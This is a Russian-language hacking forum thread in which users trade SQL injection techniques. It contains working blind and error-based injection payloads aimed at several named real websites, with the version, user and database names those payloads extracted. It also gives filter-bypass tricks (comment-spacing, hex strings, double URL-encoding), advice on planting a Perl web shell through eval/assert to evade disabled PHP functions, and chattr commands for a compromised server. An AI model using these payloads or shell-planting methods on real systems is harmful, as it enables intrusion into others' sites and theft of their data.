PHP: if (is_file($_GET['cfg']) and dirname($_GET['cfg'])=='.' ) $_SESSION['configfile']=$_GET['cfg']; else $_SESSION['configfile']="cryptographp.cfg.php"; include($_SESSION['configfile']); Реально ли это как-то раскрутить?
Фильтруется вообще куча всего, проще перечислить что не фильтруется =) (substring кстати фильтруется тоже, чего не скажешь о substr) Но тем не менее... Для вывода версии юзал так Code: http://neoncolor.ru/catalog/?s=2&gr=642+and+ascii(lower(substr(@@version,1,1)))=53 Ну или более экзотический вариант Code: ttp://neoncolor.ru/catalog/?s=2&gr=642+and+right(left(@@version,1),1)=5 Version = 5.0.77 @@user и user() фильтруется, точно также обстоит дело и с именами БД. Абсолютно солидарен с товарищем - перед слепой инъекцией не поленитесь проверить с какой СУБД имеем дело, например руководствуясь уникальными функциями каждой СУБД этого поста тут дело обстоит намного проще - фильтруется пробелы - юзай /**/ Code: http://xao.ru/review'/**/OR/**/(SELECT/**/COUNT(*)/**/FROM/**/(SELECT/**/1/**/UNION/**/SELECT/**/2/**/UNION/**/SELECT/**/3)x/**/GROUP/**/BY/**/MID(VERSION(),FLOOR(RAND(0)*2),64))/**/and/**/1='1 Duplicate entry '5.0.77-log' for key 1 User = 'cl61392_xaoruweb@localhost' Database = 'cl61392_xaoruweb' Прикольная скуля, не сразу додумался в каком параметре искать... Хоть бы указал... Ну вот держи вектор атаки Code: http://oring.com.ua/products/uponor-wirsbo/truba1.php'/**/OR/**/(SELECT/**/COUNT(*)/**/FROM/**/(SELECT/**/1/**/UNION/**/SELECT/**/2/**/UNION/**/SELECT/**/3)x/**/GROUP/**/BY/**/MID(VERSION(),FLOOR(RAND(0)*2),64))/**/and/**/1='1 Duplicate entry '4.1.21-standard' for key 1 Version = 4.1.21-standard User = oring_com_ua@localhost Database = oring_com_ua Дальше сам справишься?)
Небольшое дополнение. Вынесу в отдельный пост, а то предыдущий длиннопост и так сложен для восприятия. Надеюсь, модераторы не осерчают... =) Не давала покоя скуля, была идея проверить на магические кавычки, вдруг получится шелл залить... Code: http://neoncolor.ru/catalog/?s=2&gr=642+and+1=IF('123'=123,1,0) FALSE http://neoncolor.ru/catalog/?s=2&gr=642+and+1=IF(123=123,1,0) TRUE Как видишь, облом. Так что, ИМХО, на сайт можно забить...
Code: Disabled PHP Functions: apache_setenv, chown, chgrp, closelog, define_syslog_variables, dl, exec, ftp_exec, openlog, passthru, pcntl_exec, popen, posix_getegid, posix_geteuid, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_open, proc_terminate, shell_exec, syslog, system какие еще функции есть которые выполняяют системные команды?
Это необходимо смотреть по функциям и классам, доступным на данном сервере вычитая из них всё заблокированное и бесполезное. Такие вопросы обычно решаются индивидуально т.к. сложно дать ответ не имея полного представления о сервере. UDP. Всю необходимую информацию можно получить с помощью get_defined_functions(), get_defined_vars(), get_defined_constants() и get_declared_classes().
blesse, ну у вас хотя бы нет в списке eval() и assert() . Можете через них свободно работать, залить через них Perl Shell (PPS 1.0) и дальше можете плевать на все эти ограничения т.к. Ваш список применим только к РНР файлам!
=-1+union+select+1,COLUMN_NAME,3,4+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=%22Users%22 есть такой запрос к базе. Users должно быть в одинарных кавычках? Одинарные кавычки заменяются на %22, есть другой способ?
переведи users в ХЕКС значение, в твоем случае оно равняется 0x7573657273 т.е твои запрос будет выглядеть так:
Вопрос по sql inj Делаю запрос: redirect.php?lid=' union select 1,2,3,4,5,6,7,8,9 --+ говорит что нужно продолжить подбирать количество столбцов ок. уже посылаю такой запрос redirect.php?lid=' union select 1,2,3,4,5,6,7,8,9,10 --+ нарушен синтаксис и выдает: Как правильно составить запрос? прощу помощи. Думаю сайт светить не обязательно. я просто тренируюсь, потом админов оповещу.
Думаю проблема или в пробеле (что навряд ли), при условии что ты нашёл инъекцию в строковой переменной. тогда попробуй запросы Code: id=1'/**/and/**/1='1 id=1'/**/and/**/1='2 Если результаты будут отличаться - фильтруется пробел Ещё возможно что ты ковыряешь целочисленную перменную, тогда попробуй так Code: id=1/**/and/**/1=1 id=1/**/and/**/1=2 Если страницы отличаются - это твой случай Перед использованием order by не грешно было бы проверить какого типа переменная перед тобой id='/**/and/**/1=1/**/order/**/by/**/100+--+ или id='/**/order/**/by/**/'100 выплюнет что столбцов много - у тебя переменная строкового типа id=/**/and/**/1=1/**/order/**/by/**/100+--+ соответственно аналог id/**/order/**/by/**/100 выплюнет что столбцов много - у тебя переменная целочисленного типа З.Ы. А вообще это заезженная тема, гораздо приятнее работать не с теорией а практикой. Так что прошу по возможности выкладывать сюда сайты, вызывающие проблемы. З.Ы.Ы. не поленись почитать это
Вообщем такая проблема, есть шелл права везде зелёные, но когда правишь любой файл он не сохраняется и даже удалить ничего нельзя, раньше было всё как обычно, но злобный админ что-то сделал что теперь я не могу ничего править и удалять, а только заливать а в шелле права сами зелёные, что мог натворить админ?
в sql инъекции не проходит точка . то есть не могу достать имена из schema.tables есть варианты? И еще если пишу + from xxx то добовляет префикс aaa.xxx
seozone, сделайте lsattr <имя файла> и смотрите параметр -i. Есди он стоит, то это и запрещает Вам редактирование! Если он есть, то можно попробовать снять, если конечно прав хватит! Code: chattr -i /etc/lilo.conf
вместо точки попробуй url=кодированоое значение точки - %2e Хотя был случай. когда фильтровалось обычное url кодирование, но не фильтровалось двойной url-кодирование. Для точки это значение %252e from+information_schema%2etables from+information_schema%252etables А префикс добавляет потому что ищет таблицу в текущей БД. Полный запрос должен быть вида from+`database`.`table1`
нет, всеравно фильтрует. попробовал char и hex -ошибка. Может можно через where и like запрос сделать без точки?
Есть слепая blind sql инъекция Проверил test.ru/forum/viewtopic.php?id=1' and 2-1='1 true test.ru/forum/viewtopic.php?id=1' and 2-1='2 false Известно название таблицы, полей Так же известно название таблицы с юзерами "users_am" и наличие полей "id" , "login", "password" Известен id и логин админа Возникает вопрос, как достать хэш пароля? в первый раз сталкиваюсь со слепой скулей. Вот незнаю как решить.
